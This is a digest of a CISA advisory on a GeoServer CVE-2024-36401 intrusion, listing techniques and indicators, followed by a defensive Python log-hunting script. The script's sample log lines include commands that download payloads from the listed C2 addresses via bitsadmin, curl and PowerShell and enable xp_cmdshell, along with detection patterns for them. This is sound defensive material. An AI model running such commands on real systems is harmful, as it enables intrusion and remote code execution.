CISA Shares Lessons Learned from an Incident Response Engagement

CISA investigated a multi-week compromise of a U.S. federal civilian executive branch agency in which threat actors exploited CVE-2024-36401 in public-facing GeoServer instances to gain RCE, uploaded web shells (including China Chopper), established C2 using Stowaway, moved laterally to a web server and an SQL server, and persisted using cron jobs, BITS abuse, and valid accounts. The advisory emphasizes prompt patching, practicing incident response plans, and centralized out-of-band logging, and it provides TTPs and IOCs to help organizations defend against similar attacks. #CVE-2024-36401 #GeoServer #Stowaway #ChinaChopper

Key points

  • Threat actors exploited GeoServer vulnerability CVE-2024-36401 to gain initial RCE on two public-facing GeoServer instances (GeoServer 1 on July 11, 2024, and GeoServer 2 on July 24, 2024).
  • Actors used open-source tools and a VPS for resource development, uploaded web shells (China Chopper and generic PHP shells), and staged tools like RingQ, BusyBox, and Stowaway on a C2 server (45.32.22.62 and 45.17.43.250 observed).
  • Lateral movement occurred from GeoServer to a web server and then to an SQL server; actors enabled xp_cmdshell, used brute force for credentials, and performed discovery with fscan and common OS/network commands.
  • Persistence and defense evasion included web shells, cron jobs, BITS job abuse, valid accounts, indirect command execution via web shells and xp_cmdshell, and attempted use of the dirtycow exploit for privilege escalation.
  • The intrusion remained undetected for ~3 weeks; detection arose from EDR alerts when a suspected malware file (1.txt) was uploaded to the SQL server, prompting containment and CISA engagement.
  • CISA’s lessons highlight failures: delayed patching of KEV-listed CVE-2024-36401, untested/insufficient IRP (including third-party access and change control delays), incomplete EDR coverage on public-facing systems, and inadequate centralized logging.
  • CISA recommends immediate KEV patching, asset discovery and prioritization, practicing and updating IRPs (including third-party access and out-of-band communications), comprehensive logging to an out-of-band SIEM, allowlisting, and phishing-resistant MFA for privileged accounts.

MITRE Techniques

  • [T1595.002] Active Scanning: Vulnerability Scanning – The actors identified CVE-2024-36401 using Burp Suite/Burp Scanner and Burp Collaborator; quote: ‘…observed domains linked to Burp Collaborator…originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability…’
  • [T1583.003] Acquire Infrastructure: Virtual Private Server – Actors used a commercially available VPS from a cloud provider to gain remote access and conduct operations; quote: ‘…leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider…’
  • [T1190] Exploit Public-Facing Application – Actors exploited CVE-2024-36401 on two GeoServer instances to achieve RCE via eval injection; quote: ‘…exploited CVE 2024-36401…to gain RCE by performing “eval injection”…’
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell was used to download payloads; quote: ‘…used PowerShell to download a payload.’
  • [T1202] Indirect Command Execution – Actors executed commands indirectly via .php web shells and xp_cmdshell to evade detection; quote: ‘…employed indirect command execution via .php web shells and xp_cmdshell…’
  • [T1197] BITS Jobs – Actors abused Background Intelligent Transfer Service (BITS) jobs for defense evasion and file transfer; quote: ‘…abused Background Intelligent Transfer Service (BITS) jobs…’
  • [T1053.003] Scheduled Task/Job: Cron – Cron jobs were used to establish persistence on compromised hosts; quote: ‘…cron jobs (scheduled commands that run automatically at specified times)…’
  • [T1505.003] Server Software Component: Web Shell – Web shells (China Chopper and generic PHP shells) were uploaded to internet-facing hosts for persistence and command execution; quote: ‘…uploaded web shells such as China Chopper…’
  • [T1078] Valid Accounts – Threat actors used valid accounts and created accounts (later deleted) to maintain persistence; quote: ‘…used valid accounts for persistence…’
  • [T1068] Exploitation for Privilege Escalation – Actors attempted to use the dirtycow public exploit (CVE-2016-5195) to escalate privileges; quote: ‘…attempted to escalate privileges with the publicly available dirtycow tool…’
  • [T1110] Brute Force – Brute force techniques were used to obtain passwords for lateral movement and privilege escalation; quote: ‘…primarily relied on brute force techniques to obtain passwords…’
  • [T1087.001] Account Discovery: Local Account – Actors used commands like cat /etc/passwd to discover local users; quote: ‘…used cat /etc/passwd…’
  • [T1083] File and Directory Discovery – Actors used directory and file listing commands (dir, type) on the SQL server to enumerate files and directories; quote: ‘…used dir c:, dir d:, dir e:, and type c: commands…’
  • [T1046] Network Service Discovery – fscan was used to identify SSH listeners, FTP servers, and other services for lateral movement; quote: ‘…used fscan to identify SSH listeners and FTP servers.’
  • [T1057] Process Discovery – Actors ran tasklist on the SQL server to enumerate running processes; quote: ‘…used tasklist on the SQL server.’
  • [T1018] Remote System Discovery – Actors performed ping sweeps of hosts within specific subnets to find reachable systems; quote: ‘…performed ping sweeps of hosts within specific subnets.’
  • [T1082] System Information Discovery – Commands like cat /etc/redhat-release and cat /etc/os-release were used to collect OS information; quote: ‘…used cat /etc/redhat-release and cat /etc/os-release…’
  • [T1016] System Network Configuration Discovery – ipconfig was executed to check network configuration on compromised hosts; quote: ‘…used ipconfig to check GeoServer 1’s and the SQL server’s network configurations.’
  • [T1049] System Network Connections Discovery – netstat and netstat -ano were used to list network connections for discovery; quote: ‘…executed commands such as netstat to obtain a listing of network connections…’
  • [T1033] System Owner/User Discovery – whoami was used on the SQL server to determine the current user context; quote: ‘…used whoami on the SQL server.’
  • [T1105] Ingress Tool Transfer – PowerShell and bitsadmin getfile were used to download payloads and tools to compromised hosts; quote: ‘…used PowerShell and bitsadmin getfile to download payloads.’
  • [T1090] Proxy – The Stowaway multi-level proxy was used to establish C2 and forward traffic through the web server to access internal resources; quote: ‘…used Stowaway…to establish C2…forwarding traffic from their C2 server through the Web Server.’

Indicators of Compromise

  • [IPv4] C2 server IP addresses observed mid-July to early August 2024 – 45.32.22.62, 45.17.43.250
  • [MD5] Web shells and tools (mid-July to early August 2024) – 0777EA1D01DAD6DC261A6B602205E2C8 (China Chopper), feda15d3509b210cb05eacc22485a78c (generic PHP web shell)
  • [MD5] Exploit and proxy tool hashes – C9F4C41C195B25675BFA860EB9B45945 (Linux exploit/CVE-2016-5195), 64e3a3458b3286caaac821c343d4b208 (Stowaway proxy tool)
  • [MD5] Dirtycow and other executables – B7B3647E06F23B9E83D0B1CCE3E71642 (Dirtycow), 20b70dac937377b6d0699a44721acd80 and de778443619f37e2224898a9a800fa78 (unknown downloaded executables)
  • [File names] Tools and scripts hosted on C2 and uploaded to hosts – examples: RingQ.exe / RingQ.rar (RingQ tool), mm.sh / aa.sh (downloaded shell scripts), Handx.ashx and start_tomcat.jsp (web shells)
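The advisory's point about centralized, out-of-band logging only pays off if the collected logs are actually searched for the TTPs and IOCs above. The script below is an added example, not CISA's code or anything from the advisory: it hunts over log lines for the C2 addresses, MD5 hashes and file names listed in this digest, and for the command-line behaviours the MITRE list attributes to the actors (bitsadmin transfers, PowerShell downloads, xp_cmdshell, cron, fscan, dirtycow), tagging each behavioural hit with its ATT&CK ID. The log lines, host names and paths are constructed for the example, the regular expressions and the exact ATT&CK-to-pattern mapping are my own choices, and the log formats are illustrative rather than any vendor's schema.

```python
"""Offline hunt for IOCs and command-line TTPs from CISA advisory AA25-266a.

IOC values come from the advisory digest; log lines below are constructed
samples, not real telemetry. Regex patterns are the author's assumptions.
"""
import re

# --- Atomic indicators from the advisory (IPs, MD5s, file names) ---------------
C2_IPS = {"45.32.22.62", "45.17.43.250"}

KNOWN_MD5 = {h.lower(): desc for h, desc in [
    ("0777EA1D01DAD6DC261A6B602205E2C8", "China Chopper web shell"),
    ("feda15d3509b210cb05eacc22485a78c", "generic PHP web shell"),
    ("C9F4C41C195B25675BFA860EB9B45945", "Linux exploit (CVE-2016-5195)"),
    ("64e3a3458b3286caaac821c343d4b208", "Stowaway proxy"),
    ("B7B3647E06F23B9E83D0B1CCE3E71642", "Dirtycow"),
    ("20b70dac937377b6d0699a44721acd80", "unknown downloaded executable"),
    ("de778443619f37e2224898a9a800fa78", "unknown downloaded executable"),
]}

KNOWN_FILENAMES = {"ringq.exe", "ringq.rar", "mm.sh", "aa.sh",
                   "handx.ashx", "start_tomcat.jsp"}

# --- Behavioural patterns, mapped to the ATT&CK IDs the advisory uses ----------
# (pattern wording is an assumption; tune to your own telemetry)
TTP_PATTERNS = [
    ("T1197", re.compile(r"\bbitsadmin\b.*\b(?:transfer|getfile|addfile|create)\b", re.I)),
    ("T1059.001/T1105", re.compile(
        r"\bpowershell\b.*\b(?:downloadstring|downloadfile|invoke-webrequest|iwr|wget|curl)\b", re.I)),
    ("T1202", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("T1053.003", re.compile(r"\bcrontab\b|/etc/cron", re.I)),
    ("T1046", re.compile(r"\bfscan\b", re.I)),
    ("T1068", re.compile(r"\bdirty_?cow\b", re.I)),
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5 = re.compile(r"\b[0-9a-fA-F]{32}\b")
# Bare file names (path separators excluded) with the extensions seen in the IOC list.
FILENAME = re.compile(r"[\w.-]+\.(?:exe|rar|sh|ashx|jsp|php)\b", re.I)


def scan_line(line):
    """Return a list of (category, detail) hits for one log line; [] if clean."""
    hits = []
    for ip in set(IPV4.findall(line)):
        if ip in C2_IPS:
            hits.append(("c2_ip", ip))
    for digest in set(MD5.findall(line)):
        if digest.lower() in KNOWN_MD5:
            hits.append(("known_hash", KNOWN_MD5[digest.lower()]))
    for name in set(FILENAME.findall(line)):
        if name.lower() in KNOWN_FILENAMES:
            hits.append(("known_filename", name))
    for technique, pattern in TTP_PATTERNS:
        if pattern.search(line):
            hits.append(("ttp", technique))
    return hits


def scan_log(lines):
    """Map 1-based line numbers to their hits, keeping only lines that matched."""
    return {n: h for n, line in enumerate(lines, 1) if (h := scan_line(line))}


def matched_techniques(lines):
    """Sorted, de-duplicated ATT&CK IDs observed across the whole log."""
    return sorted({d for hits in scan_log(lines).values() for c, d in hits if c == "ttp"})


# Constructed sample log (mixed sources); none of these lines are from the advisory.
SAMPLE_LOG = [
    '45.32.22.62 - - [18/Jul/2024:03:14:07 +0000] "POST /geoserver/Handx.ashx HTTP/1.1" 200 512',
    "host=websrv02 event=file_create path=/var/www/html/x.php md5=feda15d3509b210cb05eacc22485a78c",
    r'host=websrv02 event=process_create cmdline="bitsadmin /transfer job1 http://45.17.43.250/aa.sh C:\Temp\aa.sh"',
    "host=sqlsrv01 event=sql_audit statement=\"EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;\"",
    '10.0.0.5 - - [18/Jul/2024:03:15:00 +0000] "GET /geoserver/web/ HTTP/1.1" 200 8192',
    'host=geoserver1 cmd="crontab -l; curl http://45.32.22.62/mm.sh -o /tmp/mm.sh"',
    r'''host=sqlsrv01 event=process_create cmdline="powershell -nop -c (New-Object Net.WebClient).DownloadFile('http://45.17.43.250/RingQ.rar','C:\Temp\RingQ.rar')"''',
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {hits}")
    print("techniques:", matched_techniques(SAMPLE_LOG))
```

The atomic indicators (hashes, IPs, file names) are only useful retrospectively, since the actors can trivially change all three; the behavioural patterns are what would have surfaced the bitsadmin transfers, xp_cmdshell enablement and cron persistence during the three weeks the intrusion went unnoticed. Both kinds of check presuppose that the web, SQL and host logs are shipped to a collector the actors cannot reach, which is exactly the out-of-band SIEM the advisory recommends.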

Read more: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a